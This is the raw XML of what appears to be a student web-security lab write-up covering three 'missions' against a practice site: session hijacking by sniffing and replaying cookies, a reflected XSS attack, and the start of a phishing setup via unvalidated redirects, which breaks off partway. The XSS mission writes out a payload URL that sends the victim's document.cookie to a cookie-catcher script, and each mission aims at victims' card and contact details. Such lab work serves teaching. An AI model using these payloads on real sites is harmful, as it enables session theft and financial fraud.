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83C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Case Study 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRPr="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRPr="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Authentication and Session Hijacking </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRPr="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Scripting </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRPr="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redirects and Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C">
      <w:r w:rsidRPr="00FA5B57">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve">Mission </w:t>
      </w:r>
      <w:r w:rsidR="00FA5B57" w:rsidRPr="00FA5B57">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00FA5B57" w:rsidRPr="00FA5B57">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA5B57">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TO find the Victim Credit Card Information along with name, </w:t>
      </w:r>
      <w:r w:rsidR="00FA5B57">
        <w:t>city and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Phone number In </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">LOCAL </w:t>
      </w:r>
      <w:r w:rsidR="00FA5B57">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">AREA </w:t>
      </w:r>
      <w:r w:rsidRPr="0091683C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NETWORK [LAN]</w:t>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:t xml:space="preserve"> using Packet Sniffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="0091683C" w:rsidP="0091683C"/>
    <w:p w:rsidR="00FA5B57" w:rsidRPr="00FA5B57" w:rsidRDefault="00FA5B57" w:rsidP="0091683C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA5B57">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Solution :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="00FA5B57" w:rsidP="0091683C">
      <w:r>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="00765B1A" w:rsidP="00FA5B57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Any</w:t>
      </w:r>
      <w:r w:rsidR="0091683C">
        <w:t xml:space="preserve"> Browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (We Use Chrome)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="0091683C" w:rsidP="00FA5B57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fiddler / </w:t>
      </w:r>
      <w:r w:rsidR="00FA5B57">
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007F02C8">
        <w:t xml:space="preserve"> Packet Sniffing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007F02C8">
        <w:t>Software .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="00FA5B57" w:rsidP="007F02C8">
      <w:r>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="00600F5D">
        <w:t>. Open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Chrome Browser and register </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>yourself .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  You will Be Redirected to login page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="007F02C8" w:rsidP="00FA5B57"/>
    <w:p w:rsidR="00600F5D" w:rsidRDefault="00600F5D" w:rsidP="00FA5B57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6220509" cy="29813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114" cy="298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C8" w:rsidRDefault="007F02C8" w:rsidP="007F02C8"/>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="007F02C8" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve">2). Open Fiddler or Wireshark turn Capture Packet on. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="007F02C8" w:rsidP="007F02C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EA0CC2F" wp14:editId="49C5D90D">
            <wp:extent cx="5219700" cy="32071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940" cy="32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3C" w:rsidRDefault="0091683C" w:rsidP="007F02C8"/>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="007F02C8" w:rsidP="007F02C8">
      <w:r>
        <w:t>3).Enter the Username and Password.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0091683C" w:rsidRDefault="007F02C8" w:rsidP="007F02C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4981575" cy="369413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46" cy="369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39" w:rsidRDefault="00240739" w:rsidP="007F02C8"/>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="007F02C8" w:rsidP="007F02C8">
      <w:r>
        <w:t>4). Switch to fiddler Window</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,  Details</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are clearly Showed on Screen Shot .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="007F02C8" w:rsidP="007F02C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3235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39" w:rsidRDefault="00240739" w:rsidP="007F02C8">
      <w:r>
        <w:t>5). Now we have captured Packets of the Victim with Sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240739" w:rsidRDefault="00240739" w:rsidP="007F02C8">
      <w:r>
        <w:t>6). Double Click on the response and click on cookies tab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F02C8" w:rsidRDefault="00240739" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3239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39" w:rsidRDefault="00240739" w:rsidP="007F02C8"/>
    <w:p w:rsidR="00240739" w:rsidRDefault="00240739" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve">7).Now go to Composer Tab </w:t>
      </w:r>
      <w:r w:rsidR="005973E2">
        <w:t xml:space="preserve">and drag and drop the response packet in composer tab. It will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005973E2">
        <w:t>paste  the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005973E2">
        <w:t xml:space="preserve"> sniffed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005973E2">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005973E2">
        <w:t xml:space="preserve"> along with the cookie information. And hit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005973E2">
        <w:t>Execute .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="005973E2" w:rsidRDefault="005973E2" w:rsidP="007F02C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3230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E2" w:rsidRDefault="005973E2" w:rsidP="007F02C8"/>
    <w:p w:rsidR="005973E2" w:rsidRDefault="005973E2" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve">8).The respond Packet uses the hijacked session and get the attacker directly to the home </w:t>
      </w:r>
      <w:r w:rsidR="00A21320">
        <w:t xml:space="preserve">without entering the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A21320">
        <w:t>credentials .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A21320" w:rsidRDefault="00A21320" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve">9). You can see the details of the user by hitting the response page twice and in the response window down below right go to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WEBview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where the HTML page is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Displayed .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00A21320" w:rsidRDefault="00A21320" w:rsidP="007F02C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5667375" cy="308072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77" cy="308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65B1A" w:rsidRDefault="00765B1A" w:rsidP="00765B1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00765B1A" w:rsidRDefault="00A21320" w:rsidP="00765B1A">
      <w:r w:rsidRPr="00765B1A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mission 2:</w:t>
      </w:r>
      <w:r w:rsidR="00765B1A" w:rsidRPr="00765B1A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:t xml:space="preserve">TO find the Victim Credit Card Information along with name, city and Phone number In </w:t>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>WIDE</w:t>
      </w:r>
      <w:r w:rsidR="00765B1A" w:rsidRPr="0091683C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">AREA </w:t>
      </w:r>
      <w:r w:rsidR="00765B1A" w:rsidRPr="0091683C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NETWORK [LAN]</w:t>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:t xml:space="preserve"> using Cross Site </w:t>
      </w:r>
      <w:r w:rsidR="00A768B6">
        <w:t>Scripting (</w:t>
      </w:r>
      <w:r w:rsidR="00765B1A">
        <w:t xml:space="preserve">XSS) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00765B1A">
        <w:t>Attack .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00765B1A" w:rsidRDefault="00765B1A" w:rsidP="00765B1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00765B1A" w:rsidRDefault="00765B1A" w:rsidP="00765B1A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00240739" w:rsidRDefault="00A768B6" w:rsidP="002E4F5A">
      <w:r w:rsidRPr="00765B1A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002E4F5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="002E4F5A" w:rsidP="002E4F5A">
      <w:r>
        <w:tab/>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="002E4F5A" w:rsidP="002E4F5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chrome Browser. [Let Say it is Victim]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="002E4F5A" w:rsidP="002E4F5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mozilla Firefox </w:t>
      </w:r>
      <w:r w:rsidR="00A768B6">
        <w:t xml:space="preserve">Browser. </w:t>
      </w:r>
      <w:r>
        <w:t>[Let Say it is Attacker ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="002E4F5A" w:rsidP="002E4F5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Grease Monkey  Firefox Add-on with Cookie Injector Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="002E4F5A" w:rsidP="002E4F5A">
      <w:r>
        <w:t xml:space="preserve">1). Find the Search box at the end of the page and try </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A768B6" w:rsidRDefault="00A768B6" w:rsidP="002E4F5A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A768B6">
        <w:t>&lt;Script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A768B6">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A768B6">
        <w:t>0);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="002E4F5A" w:rsidP="002E4F5A">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a Popup comes up it means the website is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00A768B6">
        <w:t>XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000047DA" w:rsidRDefault="00A768B6" w:rsidP="00A768B6">
      <w:r>
        <w:t>2).</w:t>
      </w:r>
      <w:r w:rsidR="000047DA">
        <w:t>You can see the URL with A Get request:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A768B6" w:rsidRPr="00921E57" w:rsidRDefault="000047DA" w:rsidP="00921E57">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000047DA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Wow/searcha.php?search=%3Cscript%3Ealert%280%29%3B%3C%2Fscript%3E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4F5A" w:rsidRDefault="000047DA" w:rsidP="000047DA">
      <w:r>
        <w:t xml:space="preserve">3). Now using the document. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Cookie(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) Function we are going to steal the cookie from the user browser and save it to the cookie.html file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000047DA" w:rsidRDefault="000047DA" w:rsidP="000047DA">
      <w:r>
        <w:t xml:space="preserve">Type in address bar and sent the link to the remote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="000047DA" w:rsidRDefault="000047DA" w:rsidP="000047DA">
      <w:r>
        <w:tab/>
        <w:t>Wow/searcha.php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="000047DA">
        <w:t>&lt;script&gt;document.location='cookiecatcher.php?cookie='+escape(document.cookie);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000047DA" w:rsidRDefault="000047DA" w:rsidP="000047DA">
      <w:r>
        <w:t>4).In cookies .html you we have the cookies saved in the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000047DA" w:rsidRDefault="000047DA" w:rsidP="000047DA">
      <w:r>
        <w:t xml:space="preserve">5). Now the Next thing is to Inject this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cookie(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>using the cookies to get the Home page).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000047DA" w:rsidRDefault="00921E57" w:rsidP="000047DA">
      <w:r>
        <w:t xml:space="preserve">6).To inject cookies we use Grease Monkey </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Add</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-on with a cookie Injector script installed .</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Alt+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a popup will open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>up ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Paste the cookie and hit Ok .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921E57" w:rsidRDefault="00921E57" w:rsidP="000047DA"/>
    <w:p w:rsidR="00921E57" w:rsidRDefault="00921E57" w:rsidP="000047DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5947525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1" cy="19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5A" w:rsidRPr="00765B1A" w:rsidRDefault="002E4F5A" w:rsidP="00765B1A"/>
    <w:p w:rsidR="00240739" w:rsidRDefault="00240739" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00921E57">
        <w:t>7). Now go to home.php you can see User Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921E57" w:rsidRDefault="00921E57" w:rsidP="007F02C8"/>
    <w:p w:rsidR="00921E57" w:rsidRDefault="00F02B0B" w:rsidP="007F02C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="2864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0B" w:rsidRDefault="00F02B0B" w:rsidP="007F02C8"/>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Mission 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00765B1A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00765B1A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>TO find the Victim Credit Card Information along wit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">h name, city and Phone number using </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Phishing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> redirect and Forwards )</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:r w:rsidRPr="00765B1A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="007F02C8">
      <w:r>
        <w:t xml:space="preserve">We have to </w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>Folders:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRPr="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wow: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02B0B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Original Website </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRPr="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Remote-</w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>Attacker:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02B0B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Duplicate/fake/phishing Website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00E03F97">
      <w:r>
        <w:t>1). We have to redirect victim to the phishing web site using social engineering , so that he will click on the link and enter the credentials .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02B0B" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B">
      <w:r>
